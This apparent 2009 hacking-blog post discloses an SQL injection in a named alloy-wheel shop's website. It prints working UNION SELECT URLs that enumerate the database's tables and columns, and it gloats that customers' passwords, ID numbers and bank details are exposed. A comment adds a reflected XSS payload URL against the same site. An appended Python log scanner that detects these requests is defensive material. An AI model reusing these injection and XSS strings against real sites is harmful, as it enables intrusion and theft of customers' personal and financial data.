
    Posted by 2fingers in English News

    Posted on January 26th, 2009

    Vulnerability reported by daemien:

    Site URL: http://www.shop-jante.ro

    DB Name: cardesign_new

    Database version: 5.0.22

    ————–

    At first glance it looks like an ordinary site, a simple alloy-wheel shop [admittedly stocking only high-end brands]. It is a pity about the large number of customers [both individuals and companies] who do not know what risks they expose themselves to when they register on this site, which is evidently poorly secured!

    Information such as the following can easily be extracted from the database: username, password, email, last name, first name, address, ID card series, CNP (personal numeric code), phone, account, bank, etc…

    Pretty fucked up.. huh?! :) ))))))))

    ————–

    Tables:

    http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,table_name,4%20from%20information_schema.tables–

    Columns:

    http://www.shop-jante.ro/search.php?id=2+and+1=0+union+select+1,2,column_name,4%20from%20information_schema.columns–


    Thanks, daemien
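
A detection check for the request pattern reported above, as an added example that is not part of the original post: it flags access-log entries where the `id` parameter of `search.php` is not purely numeric or carries a UNION/`information_schema` marker. The log lines are constructed samples, and the assumption that `id` is always an integer is inferred from `id=2` in the reported URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: search.php only ever expects a numeric id (the page shows id=2).
NUMERIC_PARAMS = {"/search.php": ["id"]}
SQLI_MARKERS = re.compile(r"\bunion\b.+\bselect\b|\binformation_schema\b", re.I | re.S)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jan/2009:10:01:12 +0200] "GET /search.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Jan/2009:10:02:40 +0200] "GET /search.php?id=2+and+1=0+union+select'
    '+1,2,table_name,4%20from%20information_schema.tables HTTP/1.1" 200 18234',
    '203.0.113.9 - - [26/Jan/2009:10:02:55 +0200] "GET /search.php?id=2+and+1=0+union+select'
    '+1,2,column_name,4%20from%20information_schema.columns HTTP/1.1" 200 20991',
]

def check_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    # parse_qs decodes both '+' and %20 to spaces, so encoded payloads normalise.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in NUMERIC_PARAMS.get(parts.path, []):
        for value in params.get(name, []):
            if not re.fullmatch(r"[0-9]+", value):
                findings.append(f"{name}: non-numeric value")
            if SQLI_MARKERS.search(value):
                findings.append(f"{name}: UNION/information_schema marker")
    return findings

def scan_log(lines):
    """Return (line_number, target, findings) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = check_request(match.group(1))
            if findings:
                hits.append((number, match.group(1), findings))
    return hits

if __name__ == "__main__":
    for number, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {target}\n    " + "; ".join(findings))
```

The same integer check belongs in the application itself, together with a parameterized query, so that a non-numeric `id` is rejected before it reaches the database.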


    2 Responses to “Sql Injection in shop-jante.ro”

    1. xZu Says:

      “It is a pity about the large number of customers”
      Indeed…
      Off topic: 2fingers, you can upload the pictures to http://tinypic.com … the pop-ups from imageshack bother me.
      Thanks

    2. daemien Says:

      I apologize for forgetting to mention the XSS vulnerability in the mail as well, so .. tadadadaaaaammmmm:
      http://shop-jante.ro/filterByCar.php?marcaMasina=46&anul=2003&model=%22%3E%3Cscript%3Ealert(/daemien@sysboard.net/)%3C/script%3E&diameter=8.5×20

      :-|
